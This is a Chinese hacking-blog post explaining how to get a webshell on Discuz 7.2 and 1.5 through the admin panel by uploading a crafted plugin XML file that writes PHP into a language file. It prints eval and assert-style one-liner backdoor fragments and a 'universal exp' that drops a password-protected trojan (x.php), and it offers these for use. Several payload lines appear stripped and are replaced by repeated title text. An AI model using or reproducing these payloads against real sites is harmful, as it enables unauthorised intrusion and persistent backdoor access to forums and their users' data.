我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>网络攻防>> 渗透测试dz7.2&1.5后台拿shell,无ucenter非创始人
dz7.2&1.5后台拿shell,无ucenter非创始人
4322
0推荐
0评论

这是在没有ucenter和manyou插件漏洞并且不是创始人的情况下的.
6.0和7.0就不说了. 直接开始吧,
先说7.2.
在那篇文章最后说’如果你愿意,可以使用base64_encode(serialize($a))的方法试试7.2获取Webshell.’
我尝试了很久都无效, 就找了个7.2的后台试验了一下.
方法是插件处添加xml文件.
这段代码是7.2和1.5通用的.

dz7.2&1.5后台拿shell[无ucenter非创始人

“>

dz7.2&1.5后台拿shell[无ucenter非创始人

上传后在forumdataplugins文件夹下生成shell.lang.php文件.
内容如下:
‘b’,
‘);phpinfo();?>’ => ‘x’,
);
?>
看到了, ;phpinfo();?> 写出来了, 配上头文件就语句正常.
访问shell.lang.php正常显示phpinfo, 既然能写出来,就说明肯定能获得shell的.
那尝试直接写入一句话.
直接把;phpinfo();?>替换为;@eval($_POST['adm1n']);?>试试.
上传后结果如下:
看到”, 明白肯定是被替换添加了. 打开源文件看:
‘=>1);@eval($_POST['admin163']);?>”)?>’,
);
?>
单引号前被添加了, 就无效了. 那就换个无单引号的试试.
用这条

dz7.2&1.5后台拿shell[无ucenter非创始人

直接打开文件shell.lang.php, 显示空白. 应该是成功了.
可按照一句话格式输入地址?adm1n=assert显示
“)?>’, ); ?>
就是说明闭合生效, 完美运行.
文件源码如下:
‘=>1);( $_=@$_GET[admin163]).@$_($_POST[org])?>”)?>’ ,
);
?>完美拼凑一个一句话:

dz7.2&1.5后台拿shell[无ucenter非创始人

成功连接一句话…
——-
这里说一下.. 好意外.. 怎么变的这么简单了..
当时我拿的那个站, 这样也不行, 当时还没用其他的dz7.2的站试验, 也没法看源码.. 而且php还是无报错回显的, 完全不知道怎么回事, 更不知道是单引号的问题, 因为我尝试了各种单引号双引号无引号..都不可以.. 尝试创建文件写入一句话也失败
免杀问题也考虑过, base64_encode(serialize($a))这个更是各种尝试.. 而本目录既然能生成shell.lang.php文件就说明是可写的, 也不存在不可写问题.. 当时真是想破了脑袋.. 最后是用

dz7.2&1.5后台拿shell[无ucenter非创始人

这样一个字符一个字符写进去的… 可现在..
这文章都写了这么多了.. 重写麻烦.. 还是发了吧..
——
另外1.5同上..
在来个通用的exp吧..

dz7.2&1.5后台拿shell[无ucenter非创始人

1);fputs(fopen(“x.php”,”w”),”]]>

dz7.2&1.5后台拿shell[无ucenter非创始人

直接传这个插件里, 然后直接打开
forumdata/plugins/adm1n.lang.php
文件就会在本目录下生成一个密码为f4ck的一句话木马x.php
就这样吧.. 尴尬.. 等在想想题材吧..

dz7.2&1.5后台拿shell[无ucenter非创始人


已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415